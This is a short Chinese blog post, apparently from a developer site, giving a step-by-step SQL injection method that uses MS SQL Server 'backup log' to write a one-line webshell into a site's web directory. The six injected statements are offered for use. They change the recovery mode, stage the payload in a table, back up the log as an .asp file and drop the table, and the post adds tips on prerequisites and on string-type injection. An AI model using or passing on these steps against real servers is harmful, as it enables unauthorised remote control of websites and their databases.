剖析Log备份

一、前言
这是一种导出日志文件到web目录来获得shell的备份方法。

1.重用性好
多次备份的成功率

2.备份的SHell小
相对差异备份而言

3.成功率高
目前用backup log来测试的成功率是100%,就这样分析似乎不应该有失败的情况。

二、条件

1、必需得知道Web目录

2.Web和数据库没有分离

PS:如果WEB和数据库分离,并不代表我们没有机会,我们照样可以备份,只是需要满足些条件。

三、具体步骤:

第一步:
;alter database 库名 set RECOVERY FULL–

第二步:
;create table cmd (a image)–

第三步:
;backup log 库名 to disk = ‘c:\cmd’ with init–

这样有点类似于增量备份的第一步,不过有点不同的是,做了这一步以后,备份出来的可用的shell是固定的。

第四步:
;insert into cmd (a) values (0x一句话木马)–

第五步:
;backup log 库名 to disk = ‘Web路径\hack58.asp’–

第六步:
;drop table cmd–

PS:如果是字符型,请一定在语句前加’

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

三朝看客

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值